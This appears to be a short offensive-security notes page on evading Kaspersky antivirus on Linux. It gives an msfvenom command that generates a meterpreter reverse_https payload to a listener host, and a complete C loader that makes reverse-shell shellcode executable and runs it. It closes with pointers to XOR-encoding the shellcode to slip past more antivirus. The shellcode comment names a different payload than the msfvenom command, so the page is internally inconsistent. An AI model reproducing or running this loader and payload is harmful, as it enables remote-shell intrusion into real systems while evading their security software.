All Gitbook

AV Bypass

Bypass Kaspersky

generate payload
msfvenom -p linux/x64/meterpreter/reverse_https lhost=192.168.119.120 lport=443 -f c
hack.c
#define _GNU_SOURCE
#include <sys/mman.h> // for mprotect 
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

//'linux/x64/shell_reverse_tcp' payload
unsigned char buf[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x01\xbb\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

int main (int argc, char **argv) 
{
        intptr_t pagesize = sysconf(_SC_PAGESIZE);
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
                pagesize, PROT_READ|PROT_EXEC))
        {
                perror("mprotect");
                return -1;
        }
        	
	int (*ret)() = (int(*)())buf;
  	ret();
  
        return 0;
}

if compiling on Kali, we would need to be sure the processor architecture matched the target environment

XOR Encoder to obfuscate raw shellcode and bypass more AV

Update shellcode wrapper to incorporate decoding

PreviousLinuxNextShared Library Hijacking

Last updated